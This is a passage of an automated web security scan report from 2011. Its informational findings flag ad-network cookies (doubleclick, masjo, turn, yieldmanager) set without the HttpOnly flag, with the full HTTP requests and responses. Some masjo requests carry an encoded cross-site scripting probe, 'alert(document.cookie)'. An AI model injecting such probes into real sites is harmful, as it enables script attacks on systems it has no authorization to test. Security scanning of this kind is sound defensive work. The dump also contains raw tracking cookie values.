GET /orbserv/hbpix?pixId=4548&pcv=47 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv181qq00f0o01050110e; rdrlst=...[SNIP]...; sglst=...[SNIP]...; vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv18e3v00g0o02050210f; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Set-Cookie: orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Set-Cookie: rdrlst=...[SNIP]...; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Set-Cookie: sglst=...[SNIP]...; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?t=2&id=961073&id=1146992&id=1146943&id=1146965&id=1146949&id=750331&id=643545&id=970658&id=750295&id=276802
Content-Length: 0
Date: Tue, 25 Jan 2011 01:35:46 GMT


14.187. http://ad.doubleclick.net/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • id=c653243310000d9|1323822/422931/14998|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3a99/f/b2/*/d;234819764;0-0;0;55748943;4307-300/250;40168029/40185816/1;;~sscs=?http:/r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=http%3a%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D28533%26rURL%3D/webbmipage1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=http:%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D28533%26rURL%3D/webbmipage1
Set-Cookie: id=c653243310000d9|1323822/422931/14998|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 24 Jan 2011 22:29:19 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


14.188. http://ad.masjo.com/www/delivery/ajs.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.masjo.com
Path:   /www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • OAID=84cb75988ed38bcbe06c44d77408a71e; expires=Tue, 24-Jan-2012 21:03:52 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ajs.php?zoneid=4&target=_blank&cb=9279381274&charset=UTF-8&loc=http%3A//www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%253Cscript%253Ealert%28document.cookie%29%253C/script%253Ec4a5acfda9b/page/419/x22&referer=http%3A//burp/show/30 HTTP/1.1
Host: ad.masjo.com
Proxy-Connection: keep-alive
Referer: http://www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%3Cscript%3Ealert(document.cookie)%3C/script%3Ec4a5acfda9b/page/419/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:03:52 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=84cb75988ed38bcbe06c44d77408a71e; expires=Tue, 24-Jan-2012 21:03:52 GMT; path=/
Content-Length: 978
Content-Type: text/javascript; charset=UTF-8

var OX_3cba64f0 = '';
OX_3cba64f0 += "<"+"a href=\'http://ad.masjo.com/www/delivery/ck.php?oaparams=2__bannerid=10__zoneid=4__cb=bd3aec0742__oadest=http%3A%2F%2Fsecure.hostgator.com%2F%7Eaffiliat%2Fcg
...[SNIP]...

14.189. http://ad.masjo.com/www/delivery/ck.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.masjo.com
Path:   /www/delivery/ck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • OAID=84cb75988ed38bcbe06c44d77408a71e; expires=Tue, 24-Jan-2012 22:29:23 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ck.php?oaparams=2__bannerid=10__zoneid=4__cb=bd3aec0742__oadest=http%3A%2F%2Fsecure.hostgator.com%2F%7Eaffiliat%2Fcgi-bin%2Faffiliates%2Fclickthru.cgi%3Fid%3Dkangaway\ HTTP/1.1
Host: ad.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=143117481.1295903077.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; __utma=143117481.1825936610.1295903073.1295903073.1295903073.1; OAID=84cb75988ed38bcbe06c44d77408a71e; __utmc=143117481; __utmb=143117481.1.10.1295903073;

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 22:29:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=84cb75988ed38bcbe06c44d77408a71e; expires=Tue, 24-Jan-2012 22:29:23 GMT; path=/
Location: http://secure.hostgator.com/~affiliat/cgi-bin/affiliates/clickthru.cgi?id=kangaway
Content-Length: 0
Connection: close
Content-Type: text/html


14.190. http://ad.masjo.com/www/delivery/lg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.masjo.com
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • OAID=84cb75988ed38bcbe06c44d77408a71e; expires=Tue, 24-Jan-2012 21:03:53 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=10&campaignid=3&zoneid=4&loc=http%3A%2F%2Fwww.masjo.com%2Fsearch%2Flearn+typing+quick+and+easy+cracka074f%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ec4a5acfda9b%2Fpage%2F419%2Fx22&referer=http%3A%2F%2Fburp%2Fshow%2F30&cb=bd3aec0742 HTTP/1.1
Host: ad.masjo.com
Proxy-Connection: keep-alive
Referer: http://www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%3Cscript%3Ealert(document.cookie)%3C/script%3Ec4a5acfda9b/page/419/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=84cb75988ed38bcbe06c44d77408a71e

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:03:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=84cb75988ed38bcbe06c44d77408a71e; expires=Tue, 24-Jan-2012 21:03:53 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.191. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
  • adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
  • fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
  • pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=11185880&cch=11185948&code=11186021&l=728x90&aid=25473179&ahcid=639152&bimpd=JfYWx_x-jXNCK9IpMegyhUWfskX0pU8P9f7Q1yXyGzQemn_EqX28BMzorUm1RHhKGx-kTq2w2kpNwnvUPTFSYA_80oR-SV_VDSGrzVIaqwv7xQM1WSLXOFPtmTbFrBpcKHYDU3ZzQbGAadh-eeMHWfO4Zgq6ktzuNhF_bLK0LPbphxV42Q4h_ZsNyhD18qZoRsuasRkxi1Z1k2rPptD9P8PLpt1hXOJjICjWtT2yiK1991S-sQEpjv_uMS6ILCsrwnU36lwYe7slfVjZEaepylBgMkh3271niMXNcwzAAnkA3U_Zfy6PETxQfgT8J-eT3nHNrRxpSP9nzpJZWA2Oy_F-ABQAi523H0QKxGD94Z1KPSA4tJC98-OHWr7_Um1WZpe8EWvwpVEb2wDc62rx0S06fjS1aNldrC9NAsPnTeFe4dD9Jr8W6-GV7RTJi0dWCJlznOYZcJIyl5aWWTKHL8QbIlH3bhQ14447S7BulD2NXHmwdmZPdbayfYow3TS_3DJsjXLE29UpHD0D8hJpAOZI2lttlojyr18-kq0-aK4JBWy7dWMINLXjafqXKN-yikbmhRmyXpRqygwkLDH5nb3wc-cQ7FRKnITKYzO3zYW_xnlzUqpmXl7pHtXggKmUbVUxMzpfpDP-5pvCsEjEu9gSUaiszXPUJLnjJ5pOEcFJzTMxAkdIK6WQ3ZcMhBFc0GRnvhpqQeoi_DKnimnnEdWAtgHpEXC7-jTjtY7xtW70-FfeNmDs5wqwDfThppao&acp=TT4o8AAAtGwK5T0lMKVG2jUduhdCo64LBk_xIw&3c=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBUDXq8Cg-TezoAqX6lAfajZWFA4200M4B9bmdvRSFp5HyFwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1sgEOam9vbWxhY29kZS5vcme6AQk3Mjh4OTBfYXPIAQnaATJodHRwOi8vam9vbWxhY29kZS5vcmcvZ2YvcHJvamVjdC9qb29tbGEvcmVwb3J0aW5nL5gCggHAAgTIArWc1RHgAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtzBe5EVxfoGXmcp6PQnZKB63g35FA%26client%3Dca-pub-1189370408998555%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7Cundefined%7C10; rds=14987%7C14983%7C14983%7C14989%7Cundefined%7C14983%7C14983%7C14983%7C14983%7C14983%7C14987%7Cundefined%7C14983; rv=1; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Thu, 27 Jan 2011 01:35:43 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
Set-Cookie: fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
Set-Cookie: pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 01:35:43 GMT
Content-Length: 10771


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

14.192. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • bh="b!!!#%!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!-?2!!!!#<ie@S!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!L(*!!!!#<h67=!!`Yp!!!!#<htUb!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#*VS!!!!#<jLPe!#-vv!!!!$<iC/K!#0$b!!!!%<hu%0!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#7(x!!!!#<ie@S!#8:i!!!!#<jc#c!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#Kbb!!!!#<jLP/!#MP0!!!!#<jLPe!#PrV!!!!#<iC/U!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#U5p!!!!#<gj@R!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#ZPo!!!!#<ie2`!#ZhT!!!!#<ie@S!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#`SX!!!!#<gj@R!#a0h!!!!#<ie2`!#a=#!!!!#<iC/U!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b=J!!!!#<jLPi!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c%+!!!!#<iC/U!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#ec+!!!!#<ie2`!#ec,!!!!#<iJoK!#f93!!!!#<gj@R!#fBu!!!!#<gj@R!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#g'E!!!!#<gj@R!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#l)E!!!!#<iC/U!#mOI!!!!#<k0fB"; path=/; expires=Wed, 23-Jan-2013 21:07:10 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?adv=60652&code=AS17&t=2&rnd=1327772520 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=2c382b2c-154d-11e0-8090-001e6849f405&_hmacv=1&_salt=2076931618&_keyid=k1&_hmac=deb36388c0462f4f1745f3224a27addc34e20c73; pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; ih="b!!!!0!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!.N)i!!!!#<htgq!.`.U!!!!#<jHA_!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF"; pv1="b!!!!%!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~"; bh="b!!!#$!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!-?2!!!!#<ie@S!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!L(*!!!!#<h67=!!`Yp!!!!#<htUb!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#*VS!!!!#<jLPe!#-vv!!!!$<iC/K!#0$b!!!!%<hu%0!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#7(x!!!!#<ie@S!#8:i!!!!#<jc#c!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#Kbb!!!!#<jLP/!#MP0!!!!#<jLPe!#PrV!!!!#<iC/U!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#U5p!!!!#<gj@R!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#ZPo!!!!#<ie2`!#ZhT!!!!#<ie@S!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#`SX!!!!#<gj@R!#a0h!!!!#<ie2`!#a=#!!!!#<iC/U!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b=J!!!!#<jLPi!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c%+!!!!#<iC/U!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#ec+!!!!#<ie2`!#ec,!!!!#<iJoK!#f93!!!!#<gj@R!#fBu!!!!#<gj@R!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#g'E!!!!#<gj@R!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#l)
E!!!!#<iC/U"

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:07:10 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh="b!!!#%!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!-?2!!!!#<ie@S!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!L(*!!!!#<h67=!!`Yp!!!!#<htUb!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#*VS!!!!#<jLPe!#-vv!!!!$<iC/K!#0$b!!!!%<hu%0!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#7(x!!!!#<ie@S!#8:i!!!!#<jc#c!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#Kbb!!!!#<jLP/!#MP0!!!!#<jLPe!#PrV!!!!#<iC/U!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#U5p!!!!#<gj@R!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#ZPo!!!!#<ie2`!#ZhT!!!!#<ie@S!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#`SX!!!!#<gj@R!#a0h!!!!#<ie2`!#a=#!!!!#<iC/U!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<h!!